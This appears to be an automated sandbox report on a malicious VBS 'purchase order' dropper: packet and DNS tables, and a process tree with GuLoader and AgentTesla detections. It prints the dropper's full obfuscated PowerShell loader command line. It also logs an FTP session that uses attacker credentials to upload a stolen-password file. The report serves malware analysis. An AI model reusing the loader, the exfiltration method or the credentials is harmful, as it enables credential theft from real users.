                                  Nov 29, 2022 18:34:32.644968033 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.803817987 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811785936 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811892033 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.811969995 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812026024 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812066078 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812089920 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812160969 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812189102 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812239885 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812350035 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812367916 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812485933 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812511921 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812616110 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812714100 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812730074 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812760115 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.812860012 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.812885046 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.813046932 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972552061 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972625971 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972683907 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972731113 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972739935 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972795963 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972850084 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972904921 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972935915 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.972959995 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.972985983 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973016024 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973071098 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973079920 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973128080 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973129988 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973186970 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973242044 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973279953 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973279953 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973297119 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973351002 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973404884 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973449945 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973450899 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973458052 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973512888 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973567009 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973622084 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:32.973622084 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973622084 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973680973 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:32.973787069 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.132894039 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133204937 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133220911 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133277893 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133336067 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133358955 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133390903 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133446932 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133482933 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133502960 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133537054 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133558989 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133598089 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133615017 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133670092 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133670092 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133724928 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133779049 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133816004 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133836031 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133863926 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133893013 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.133940935 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.133949041 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134004116 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134027004 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134131908 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134130955 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134191990 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134228945 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134293079 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134320974 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134391069 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134413004 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134505033 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134548903 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134601116 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134617090 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134665012 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.134697914 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134793997 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.134891033 CET4985580192.168.11.20162.240.62.179

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 18:34:32.433917046 CET5655753192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:32.476682901 CET53565571.1.1.1192.168.11.20
                                  Nov 29, 2022 18:34:38.424631119 CET5093453192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:38.434093952 CET53509341.1.1.1192.168.11.20
                                  Nov 29, 2022 18:34:46.357691050 CET5613453192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:46.629107952 CET53561341.1.1.1192.168.11.20

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 29, 2022 18:34:32.433917046 CET192.168.11.201.1.1.10x7526Standard query (0)qwedft.gqA (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.424631119 CET192.168.11.201.1.1.10x2534Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:46.357691050 CET192.168.11.201.1.1.10x1eecStandard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 29, 2022 18:34:32.476682901 CET1.1.1.1192.168.11.200x7526No error (0)qwedft.gq162.240.62.179A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:46.629107952 CET1.1.1.1192.168.11.200x1eecNo error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • api.ipify.org
                                  • qwedft.gq

                                  FTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Nov 29, 2022 18:34:46.696629047 CET2149858185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Nov 29, 2022 18:34:46.696991920 CET4985821192.168.11.20185.31.121.136USER klogz@mcmprint.net
                                  Nov 29, 2022 18:34:46.729505062 CET2149858185.31.121.136192.168.11.20331 User klogz@mcmprint.net OK. Password required
                                  Nov 29, 2022 18:34:46.729799986 CET4985821192.168.11.20185.31.121.136PASS l9Hh{#_(0shZ
                                  Nov 29, 2022 18:34:46.780364990 CET2149858185.31.121.136192.168.11.20230 OK. Current restricted directory is /
                                  Nov 29, 2022 18:34:46.813596010 CET2149858185.31.121.136192.168.11.20504 Unknown command
                                  Nov 29, 2022 18:34:46.813944101 CET4985821192.168.11.20185.31.121.136PWD
                                  Nov 29, 2022 18:34:46.846718073 CET2149858185.31.121.136192.168.11.20257 "/" is your current location
                                  Nov 29, 2022 18:34:46.847259998 CET4985821192.168.11.20185.31.121.136CWD /
                                  Nov 29, 2022 18:34:46.879990101 CET2149858185.31.121.136192.168.11.20250 OK. Current directory is /
                                  Nov 29, 2022 18:34:46.880294085 CET4985821192.168.11.20185.31.121.136TYPE I
                                  Nov 29, 2022 18:34:46.912998915 CET2149858185.31.121.136192.168.11.20200 TYPE is now 8-bit binary
                                  Nov 29, 2022 18:34:46.913393021 CET4985821192.168.11.20185.31.121.136PASV
                                  Nov 29, 2022 18:34:46.946330070 CET2149858185.31.121.136192.168.11.20227 Entering Passive Mode (185,31,121,136,233,124)
                                  Nov 29, 2022 18:34:46.981738091 CET4985821192.168.11.20185.31.121.136STOR PW_user-888683_2022_11_29_18_34_43.html
                                  Nov 29, 2022 18:34:47.016505957 CET2149858185.31.121.136192.168.11.20150 Accepted data connection
                                  Nov 29, 2022 18:34:47.049491882 CET2149858185.31.121.136192.168.11.20226-File successfully transferred
                                  226-File successfully transferred226 0.033 seconds (measured here), 13.16 Kbytes per second
                                  Nov 29, 2022 18:36:26.444715977 CET2149858185.31.121.136192.168.11.20226 Logout.

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:2
                                  Start time:18:33:27
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                                  Imagebase:0x7ff7414d0000
                                  File size:170496 bytes
                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Target ID:4
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:CMD.EXE /c echo C:\Windows
                                  Imagebase:0x7ff687d50000
                                  File size:289792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Target ID:5
                                  Start time:18:33:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;;
                                  Imagebase:0x910000
                                  File size:433152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  General

                                  Target ID:7
                                  Start time:18:33:33
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f8160000
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:10
                                  Start time:18:33:59
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
                                  Imagebase:0x610000
                                  File size:2141552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:moderate

                                  General

                                  Target ID:11
                                  Start time:18:34:00
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
                                  Imagebase:0x5a0000
                                  File size:46832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Target ID:12
                                  Start time:18:34:20
                                  Start date:29/11/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                  Imagebase:0xcd0000
                                  File size:106496 bytes
                                  MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Disassembly

                                  No disassembly